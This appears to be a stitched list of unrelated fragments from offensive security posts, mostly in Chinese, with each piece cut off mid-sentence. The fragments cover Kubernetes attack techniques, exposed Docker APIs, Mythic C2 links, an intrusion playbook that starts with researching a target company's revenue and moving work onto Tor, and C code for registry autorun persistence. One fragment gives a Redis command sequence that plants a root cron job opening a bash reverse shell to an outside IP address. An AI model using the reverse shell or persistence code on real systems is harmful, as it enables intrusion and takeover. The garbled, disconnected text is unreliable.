前言 文章主要根据kubernetes的威胁矩阵来进行书写,但是也会参考其他的资料。本文会结合之前在本地搭建的k8s集群进行讲解,具体搭建的文章可以参考前文。文章主要着笔点在初始访问,其他的如持久化,权限提升,凭据获取等可能会一笔带过或者只是提供一个标题供参考,因为写起来实在是又臭又长而且又和之前的
cron set 4a "\n\n*/1 * * * * bash -i >& /dev/tcp/120.79.51.115/91 0>&1\n" config set dir /var/spool/cron/ config set dbfilename root save webshell #
Docker Hacking Exposed Docker API When you install dcoker on a system it will expose an API on your local host located on port 2375.This API can be us
.386 .model flat, stdcall .stack 4096 ExitProcess PROTO, dwExitCode:DWORD INCLUDE Irvine32.inc KEY = 239 BUFMAX = 128 .data sPrompt BYTE "Enter
检查节点信息与污点配置 使用 kubectl describe nodes 命令可以详细查看节点的配置信息,包括其污点(Taints),这些污点可能影响 Pod 的调度: kubectl --server=https://10.80.0.1:443 --insecure-skip-tls-verif
项目地址 Mythic :https://github.com/its-a-feature/Mythic Agents:https://github.com/MythicAgents/ Profiles:https://github.com/MythicC2Profiles Document:htt
权限提升和信息收集 初步侦查 1.1搜索公司收入 找到公司网站 在Google上搜索:公司名称 + 收入 (mycorporation.com + revenue) (“mycorporation.com” “revenue”) 检查超过1个网站,如果可能的话 (owler, manta, zoom
网站创建批处理脚本 http://tobbot.com/data/ 非常适合创建命令,然后生成批处理文件 使用Tor网络进行工作 接下来(对于那些还没有这样做的人),我建议将整个工作站转移到通过Tor网络工作。 为此,您需要配置您的操作系统和Whonix(这是一个为您创建“安全的Tor隧道”的操作系
核心函数 #include "AutoRun.h" BOOL Reg_CurrentUser(LPCWSTR lpszFileName, LPCWSTR lpszValueName) { HKEY hKey; printf("[+] length: %d\n",::lstrlen(lpszFi